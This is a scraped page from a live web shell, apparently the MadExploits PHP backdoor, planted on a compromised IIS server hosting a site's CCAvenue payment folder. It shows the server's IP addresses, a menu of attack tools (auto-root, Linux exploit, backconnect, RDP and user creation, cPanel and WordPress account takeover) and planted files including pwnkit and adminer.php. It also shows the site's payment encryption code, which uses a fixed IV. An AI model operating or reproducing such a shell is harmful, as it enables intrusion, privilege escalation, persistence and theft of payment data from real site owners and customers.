Windows NT VMI608383 10.0 build 17763 (Windows Server 2019) AMD64
Microsoft-IIS/10.0
: 144.126.137.138 | : 216.73.216.113
Cant Read [ /etc/named.conf ]
8.1.33
IWPD_484(vsec.in_n1)
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
C: /
Inetpub /
vhosts /
vsec.in /
httpdocs /
ccav /
sec /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-rw-rw-
Crypto.php
1.32
KB
-rw-rw-rw-
adminer.php
465.43
KB
-rw-rw-rw-
banner.png
277.94
KB
-rw-rw-rw-
ccavRequestHandler.php
834
B
-rw-rw-rw-
ccavResponseHandler.php
4.42
KB
-rw-rw-rw-
config.php
121
B
-rw-rw-rw-
dataFrom.php
4.9
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rw-rw-rw-
receipt.php
6.02
KB
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : Crypto.php
<?php /* * @param1 : Plain String * @param2 : Working key provided by CCAvenue * @return : Decrypted String */ function encrypt($plainText,$key) { $key = hextobin(md5($key)); $initVector = pack("C*", 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f); $openMode = openssl_encrypt($plainText, 'AES-128-CBC', $key, OPENSSL_RAW_DATA, $initVector); $encryptedText = bin2hex($openMode); return $encryptedText; } /* * @param1 : Encrypted String * @param2 : Working key provided by CCAvenue * @return : Plain String */ function decrypt($encryptedText,$key) { $key = hextobin(md5($key)); $initVector = pack("C*", 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0a, 0x0b, 0x0c, 0x0d, 0x0e, 0x0f); $encryptedText = hextobin($encryptedText); $decryptedText = openssl_decrypt($encryptedText, 'AES-128-CBC', $key, OPENSSL_RAW_DATA, $initVector); return $decryptedText; } function hextobin($hexString) { $length = strlen($hexString); $binString=""; $count=0; while($count<$length) { $subString =substr($hexString,$count,2); $packedString = pack("H*",$subString); if ($count==0) { $binString=$packedString; } else { $binString.=$packedString; } $count+=2; } return $binString; } ?>
Close